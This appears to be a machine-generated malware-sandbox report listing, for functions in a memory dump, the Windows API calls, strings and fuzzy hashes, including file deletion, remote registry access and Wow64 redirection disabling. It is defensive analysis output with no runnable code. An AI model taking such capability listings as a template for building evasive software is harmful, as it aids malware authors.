                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                                                                                                            • String ID: DllGetClassObject
                                                                                                                                                                                                                                                                            • API String ID: 753597075-1075368562
                                                                                                                                                                                                                                                                            • Opcode ID: 4301b9d0f3cfb0984fa9c3d9e396fc924cbd5910a96be6fdb34f61c499b0fbed
                                                                                                                                                                                                                                                                            • Instruction ID: dccc784ee8310713c5a2ea59cce497d6a0a2d55ad69c5575e9cab0fea00c64be
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4301b9d0f3cfb0984fa9c3d9e396fc924cbd5910a96be6fdb34f61c499b0fbed
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6141C575604204DFDB15CF25E888B9A7BB9EF44312F1081A9AC069F245D7B0EDC8CBA4
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C848D1
                                                                                                                                                                                                                                                                            • IsMenu.USER32(?), ref: 00C848E6
                                                                                                                                                                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C8492E
                                                                                                                                                                                                                                                                            • DrawMenuBar.USER32 ref: 00C84941
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                            • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                                                                            • Opcode ID: beaa638b99c0b6905c377809c9da03aebffbae6ed841b588f17101c73499b089
                                                                                                                                                                                                                                                                            • Instruction ID: 9c73f46078c03cb01db07e7e17bf122455bc2a112f7ca235c6ebf13c01f558ce
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: beaa638b99c0b6905c377809c9da03aebffbae6ed841b588f17101c73499b089
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43415B75A0020AEFDB24EF51D884EABBBB9FF16328F044129F95597290D730EE54CB64
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
                                                                                                                                                                                                                                                                              • Part of subcall function 00C545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C54620
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C527B3
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C527C6
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00C527F6
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF8577: _wcslen.LIBCMT ref: 00BF858A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                            • API String ID: 2081771294-1403004172
                                                                                                                                                                                                                                                                            • Opcode ID: 27e4d89e457c65148e1a23366fafe3f9963972dad2a8cb7d5a10ba508572b769
                                                                                                                                                                                                                                                                            • Instruction ID: 35029aec81e1d8a60d174c22a12c3fa7c0dc95721061536e190d8950faef7719
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27e4d89e457c65148e1a23366fafe3f9963972dad2a8cb7d5a10ba508572b769
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C21F37A940108BFDB09ABA0D846DFF77F8DF46361F104129F922A71E1DB38498E9764
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00C83A29
                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(?), ref: 00C83A30
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00C83A45
                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00C83A4D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                                                            • String ID: SysAnimate32
                                                                                                                                                                                                                                                                            • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                                                            • Opcode ID: f2ccb524f45bfb0c48716bc296a1af9b9dabaf7e2f3de63efcadff12c8e7e989
                                                                                                                                                                                                                                                                            • Instruction ID: aaf30d95e53d280b11fa669db0902e200867f3803ce80b8f3b247f54020b5b9c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f2ccb524f45bfb0c48716bc296a1af9b9dabaf7e2f3de63efcadff12c8e7e989
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E921D471100245ABEF10AFE4DC80FBB37ADEB44B68F106614FAA1920D0C771CE41A768
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00C1508E,?,?,00C1502E,?,00CB98D8,0000000C,00C15185,?,00000002), ref: 00C150FD
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C15110
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00C1508E,?,?,00C1502E,?,00CB98D8,0000000C,00C15185,?,00000002,00000000), ref: 00C15133
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                            • Opcode ID: 3322016a4f9faf80e3162c7d3652e1aed7a0b7399406881a7d30906e27690e25
                                                                                                                                                                                                                                                                            • Instruction ID: a252acaacc186587146fa62de6225253fb6da34dcec5f4ce7e5619c00635cadb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3322016a4f9faf80e3162c7d3652e1aed7a0b7399406881a7d30906e27690e25
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BFF06231A40209FBDB119F94DC49BEDBFB5EF45762F5400A4F806A21A0DB749E80DB94
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BF668B,?,?,00BF62FA,?,00000001,?,?,00000000), ref: 00BF664A
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BF665C
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00BF668B,?,?,00BF62FA,?,00000001,?,?,00000000), ref: 00BF666E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                            • API String ID: 145871493-3689287502
                                                                                                                                                                                                                                                                            • Opcode ID: 0d8bbec4381175c14ce0b96a27f65e21040a8c52959c4825e61f756a4278b5ba
                                                                                                                                                                                                                                                                            • Instruction ID: 287d11fa05df9bcc1ef9d64473a0db43eea74897d1aca733c11e2157165cb3e8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d8bbec4381175c14ce0b96a27f65e21040a8c52959c4825e61f756a4278b5ba
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5DE086366015223792212725BC0CBAE6768DF92F36B050165FD01D3184DF50CC0583A8
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C35657,?,?,00BF62FA,?,00000001,?,?,00000000), ref: 00BF6610
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BF6622
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00C35657,?,?,00BF62FA,?,00000001,?,?,00000000), ref: 00BF6635
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                            • API String ID: 145871493-1355242751
                                                                                                                                                                                                                                                                            • Opcode ID: dcc403a6f571b3fec4fd099008fd8c7b962a70b5c0a849efe306c9c81edc8744
                                                                                                                                                                                                                                                                            • Instruction ID: 3c44982f280a8cee4838f89ef1c75a5040524d7df963cfc314aacc8268771d31
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dcc403a6f571b3fec4fd099008fd8c7b962a70b5c0a849efe306c9c81edc8744
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6D0E236612A267742222B25AC1DBEE6B54DE96B7134500A5AE02E2294CB60D919C7AC
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C635C4
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 00C63646
                                                                                                                                                                                                                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C6365C
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C6366D
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C6367F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$Delete$Copy
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3226157194-0
                                                                                                                                                                                                                                                                            • Opcode ID: c48d582c86c79e85bd7347aad356c9081d3f8599dbd50fdf55834827cefd14cf
                                                                                                                                                                                                                                                                            • Instruction ID: 665f7d5fe5acc2220715ea659b6d6aa90a70a97cbf24e0be7f8f72a34ae7e952
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c48d582c86c79e85bd7347aad356c9081d3f8599dbd50fdf55834827cefd14cf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2B14F72D00119ABDF21DBA4CC85EEEBBBDEF49350F1040A6F60AE7151EA349B449F61
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00C7AE87
                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C7AE95
                                                                                                                                                                                                                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C7AEC8
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C7B09D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3488606520-0
                                                                                                                                                                                                                                                                            • Opcode ID: a978beeeaa7c1d40dfcdee8c64837e967ca1981d8b226f0edfa35f0b6e284ffe
                                                                                                                                                                                                                                                                            • Instruction ID: e9024364e0b75ac40e8088d05a4d9fdeca2c09f69ed3941ead3c06ad8daa6607
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a978beeeaa7c1d40dfcdee8c64837e967ca1981d8b226f0edfa35f0b6e284ffe
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4A190B1A04301AFE720DF24C886B2AB7E5AF44714F54885DF9A9DB2D2DB71ED44CB81
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C7C10E,?,?), ref: 00C7D415
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D3F8: _wcslen.LIBCMT ref: 00C7D451
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D3F8: _wcslen.LIBCMT ref: 00C7D4C8
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D3F8: _wcslen.LIBCMT ref: 00C7D4FE
                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C7C505
                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C7C560
                                                                                                                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C7C5C3
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 00C7C606
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C7C613
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 826366716-0
                                                                                                                                                                                                                                                                            • Opcode ID: c0a2a76fd25be6cec29110d9ebe9d20b8736e2a242c350bbc8bdd3e5f6ff27f4
                                                                                                                                                                                                                                                                            • Instruction ID: fff6b0eb377dd8ee57bf3c19372ce8408bf56a61241240537bdd5cb02f1ad904
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c0a2a76fd25be6cec29110d9ebe9d20b8736e2a242c350bbc8bdd3e5f6ff27f4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71618171108246AFD714DF14C4D0E2ABBE5FF84308F54859CF59A8B292DB31ED45DB92
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C5D7CD,?), ref: 00C5E714
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C5D7CD,?), ref: 00C5E72D
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5EAB0: GetFileAttributesW.KERNEL32(?,00C5D840), ref: 00C5EAB1
                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00C5ED8A
                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00C5EDC3
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C5EF02
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C5EF1A
                                                                                                                                                                                                                                                                            • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00C5EF67
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3183298772-0
                                                                                                                                                                                                                                                                            • Opcode ID: 9a525719765fb104d17596e9f5a27218a36ca083ed9d1453084d00cce562ee51
                                                                                                                                                                                                                                                                            • Instruction ID: eb7dce2006f1984757bd0d9627c6a650df9f16e223dc5120e87bf8f1659b0259
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9a525719765fb104d17596e9f5a27218a36ca083ed9d1453084d00cce562ee51
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85515EB60083849BC728EB90D8919DBB3ECAF85351F40092EF695D3191EF71A6CC975A
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00C59534
                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32 ref: 00C595A5
                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32 ref: 00C59604
                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C59677
                                                                                                                                                                                                                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C596A2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Variant$Clear$ChangeInitType
